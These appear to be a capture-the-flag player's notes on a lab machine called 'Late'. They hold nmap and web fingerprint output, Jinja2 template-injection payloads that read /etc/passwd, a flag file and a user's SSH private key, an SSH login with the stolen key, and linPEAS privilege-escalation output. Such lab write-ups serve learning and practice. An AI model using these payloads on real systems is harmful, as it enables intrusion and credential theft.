Nmap scan report for 10.10.11.156
Host is up (0.24s latency).
Not shown: 65042 filtered tcp ports (no-response), 491 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js">
http://10.10.11.156 [200 OK] Bootstrap[3.0.0], Country[RESERVED][ZZ], Email[#,support@late.htb],
Google-API[ajax/libs/jquery/1.10.2/jquery.min.js], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)],
IP[10.10.11.156], JQuery[1.10.2], Meta-Author[Sergey Pozhilov (GetTemplate.com)],
Script, Title[Late - Best online image tools], nginx[1.14.0]


image.late.htb
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }} > foto.png (background:white/color-font:black/type-latter:anonymous pro 32px)
{{ get_flashed_messages.__globals__.__builtins__.open("/home/svc_acc/user.txt").read() }}
[+]user.txt[+]
{{ get_flashed_messages.__globals__.__builtins__.open("/home/svc_acc/.ssh/id_rsa").read() }}
[+]ssh id_rsa [+]
ssh svc_acc@10.10.11.156 -i id_rsa
user.txt
[+]PRIVIALGE ESCALATION[+]
linPeas.sh

Description:	Ubuntu 18.04.5 LTS
Release:	18.04
Codename:	bionic

Sudo version 1.8.21p2

$PATH
/home/svc_acc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /home/svc_acc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

Processes with credentials in memory (root req)
sshd: process found (dump creds from memory as root)

Searching mysql credentials and exec
/etc/mysql/my.cnf

Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd


Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg

Analyzing Interesting logs Files (limit 70)
-rw-r--r-- 1 root root 34385532 Apr 30 12:21 /var/log/nginx/access.log
-rw-r--r-- 1 root root 785 Apr 30 12:17 /var/log/nginx/error.log

SUID - Check easy privesc, exploits and write perms
/tmp/bash
CVE-2002-1614


Modified interesting files in the last 5mins
/var/mail/root


Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/lxc
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/sudo
/usr/bin/wget


Writable folder: /dev/shm


CVE
[CVE-2021-4034] PwnKit
[CVE-2021-3156] sudo Baron Samedit
[CVE-2021-3156] sudo Baron Samedit 2
[CVE-2017-5618] setuid screen v4.5.0 LPE
